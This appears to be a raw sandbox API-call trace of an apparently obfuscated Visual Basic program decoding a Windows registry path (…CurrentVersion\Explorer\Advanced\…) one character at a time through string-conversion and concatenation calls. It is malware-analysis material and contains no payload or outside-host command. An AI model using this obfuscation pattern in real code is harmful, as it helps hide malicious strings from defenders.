[0167.664] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.664] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.664] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.664] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0167.665] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.665] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.666] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.666] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.666] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.667] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0167.667] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.668] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0167.668] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.669] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.673] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.674] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.674] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.675] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.675] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.675] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.676] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.676] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0167.677] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.677] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0167.677] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.678] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.678] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.679] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.679] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.680] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0167.680] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.680] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0167.681] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.681] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.682] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.682] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.682] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.683] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.683] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.684] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0167.684] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.772] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0167.772] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.773] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0167.773] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.774] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0167.774] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.774] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0167.775] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.775] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.775] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.776] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.776] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.777] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0167.777] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.778] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.778] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.779] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0167.779] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.780] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.780] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.780] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0167.781] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.781] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0167.782] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.782] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0167.782] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.783] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0167.783] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.784] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0167.784] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.785] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150c54, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0167.785] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0167.785] VarSub (in: pvarLeft=0x28f930, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0167.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1150de4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0167.786] VarCat (in: pvarLeft=0x28f8b0, pvarRight=0x28fa00, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 